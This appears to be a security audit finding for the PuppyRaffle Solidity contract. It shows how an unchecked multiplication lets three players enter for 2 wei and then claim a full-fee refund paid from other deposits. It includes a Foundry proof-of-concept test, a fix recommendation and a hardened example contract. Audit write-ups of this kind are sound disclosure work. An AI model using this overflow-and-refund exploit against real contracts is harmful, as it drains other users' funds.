'refund' can refund a higher value than was deposited in an extreme case
When 'entranceFee' is extremely high, an address can enter the raffle with a minuscule msg.value by passing the right number of addresses so that entranceFee * newPlayers.length wraps around (unchecked arithmetic in the 0.7.x compiler). 'refund' does not look at what was actually paid; it always sends the nominal entranceFee, so the caller is refunded the extremely high entranceFee out of other participants' deposits.
Initialize the contract with an extremely high entranceFee in the test's setUp: uint256 entranceFee = type(uint256).max / 3 + 1;
With this value, entranceFee * 3 is 2^256 + 2, which wraps to 2, so three players can be entered for 2 wei. Run this test. It passes and the balances are logged to the console:
// Foundry test; lives inside the repository's existing PuppyRaffle test contract,
// which already defines entranceFee, puppyRaffle, playerOne/Two/Three and setUp.
function testCanRefundMoreThanDepositedExtreme() public {
    console.log("entranceFee : %s", entranceFee);

    // A legitimate participant funds the contract with one full entranceFee.
    address BIGplayer = address(15);
    address[] memory bigPlayers = new address[](1);
    bigPlayers[0] = BIGplayer;
    vm.deal(BIGplayer, type(uint256).max);
    vm.prank(BIGplayer);
    puppyRaffle.enterRaffle{value: entranceFee}(bigPlayers);
    assertEq(puppyRaffle.players(0), BIGplayer);

    // Three addresses at once: entranceFee * 3 wraps to 2, so 2 wei is accepted.
    address[] memory players = new address[](3);
    players[0] = playerOne;
    players[1] = playerTwo;
    players[2] = playerThree;
    puppyRaffle.enterRaffle{value: 2}(players);
    assertEq(puppyRaffle.players(1), playerOne);

    // playerOne (index 1) is refunded the full entranceFee, paid for by BIGplayer.
    console.log("Balance before : %s", playerOne.balance);
    vm.prank(playerOne);
    puppyRaffle.refund(1);
    console.log("Balance after : %s", playerOne.balance);
}
Impact: the contract can be drained of its entire balance. In the test, playerOne contributed a share of 2 wei and receives the full entranceFee, which is funded by BIGplayer's deposit; the remaining two cheap entrants can repeat this until the contract is empty.
Tools used: manual review
Recommendation: keep track of exactly how much value every address contributes (for example in a mapping) and refund only that amount, never the nominal entranceFee. Independently, make the entry check overflow-safe, either by compiling with Solidity >=0.8 (checked arithmetic) or by explicitly verifying that entranceFee * newPlayers.length does not wrap. Better yet, remove the 'refund' function.
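The following is an added illustration, not PuppyRaffle's code: a minimal contract named RaffleEntryExample (a hypothetical name) that places the wrapping entry check described above next to a version that cannot wrap and that refunds an address only what it actually deposited. Player slot removal on refund is omitted to keep the example focused.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity 0.7.6;

// Added example, not PuppyRaffle's code. Shows the entry check that wraps
// under 0.7.x beside a version that cannot wrap and that refunds only what
// the paying address actually sent in.
contract RaffleEntryExample {
    uint256 public immutable entranceFee;
    address[] public players;
    // Exact record of what each paying address deposited.
    mapping(address => uint256) public deposits;

    constructor(uint256 _entranceFee) {
        entranceFee = _entranceFee;
    }

    // Vulnerable shape. With entranceFee = type(uint256).max / 3 + 1 and
    // three addresses, entranceFee * 3 wraps to 2, so 2 wei satisfies it.
    function enterRaffleUnchecked(address[] memory newPlayers) public payable {
        require(msg.value == entranceFee * newPlayers.length, "wrong value");
        for (uint256 i = 0; i < newPlayers.length; i++) {
            players.push(newPlayers[i]);
        }
    }

    // Hardened shape: the product is checked for overflow (Solidity 0.8.x
    // does this automatically) and the caller is credited with msg.value.
    function enterRaffleChecked(address[] memory newPlayers) public payable {
        uint256 n = newPlayers.length;
        require(n > 0, "no players");
        uint256 expected = entranceFee * n;
        require(expected / n == entranceFee, "fee * count overflows");
        require(msg.value == expected, "wrong value");
        for (uint256 i = 0; i < n; i++) {
            players.push(newPlayers[i]);
        }
        deposits[msg.sender] += msg.value;
    }

    // Refund what this address deposited, never the nominal entranceFee.
    // The recorded balance is zeroed before the transfer, so a second call
    // (or a call from an address that paid nothing) gets nothing.
    function refund() public {
        uint256 amount = deposits[msg.sender];
        require(amount > 0, "nothing to refund");
        deposits[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "refund failed");
    }
}
```

With the hardened entry function, the scenario in the test above reverts at the overflow check before any funds move, and even if three addresses were entered by one payer, only that payer could reclaim the 2 wei it sent.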